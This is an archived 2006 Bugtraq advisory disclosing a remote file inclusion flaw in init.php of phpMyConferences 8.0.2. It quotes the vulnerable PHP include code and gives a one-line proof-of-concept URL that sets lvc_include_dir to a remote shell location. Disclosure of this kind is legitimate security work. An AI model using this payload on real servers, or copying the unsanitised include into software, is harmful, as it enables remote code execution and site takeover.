lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20061025033637.5639.qmail@securityfocus.com>
Date: 25 Oct 2006 03:36:37 -0000
From: Outlaw@...a-security.net
To: bugtraq@...urityfocus.com
Subject: phpMyConferences_8.0.2 Remote File Inclusion

#Aria-Security.net Advisory
#Discovered  by: The-0utl4w (O.u.t.l.a.w)
#Outlaw@...a-Security.Net
#< www.Aria-security.net >
#Special Thanx to my bestfriend: A.u.r.a  
#And Also:  DrtRp - Sh3ll - T3rr0r1st - Sivl3R and all Aria-Security's Members
#-----------------------------------------------------------

#Software: phpMyConferences_8.0.2
#Attack method: Remote File Inclusion
#Vuln. File : init.php
#Code:

// DATABASE BACKUP
//include_once(ROOT_DIR_PATH."admin/administration/backup.php");

// Statistics
$lvc_include_dir = ROOT_DIR_PATH."common/visiteurs/include/";
include_once($lvc_include_dir.'new-visitor.inc.php');

//Link to the database
$db_link = @mysql_connect(SQL_SERVEUR,SQL_USER,SQL_PASSWD);
if(!@...ql_connect(SQL_SERVEUR,SQL_USER,SQL_PASSWD)){
echo "La connexion a la base est impossible <br> Les informations fournies à l'installation ne permettent pas la connection à la base de données";
unlink(ROOT_DIR_PATH."/conf.php");
exit();
}

#POC:
http://site.com/{path}/init.php?lvc_include_dir=SHELL

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ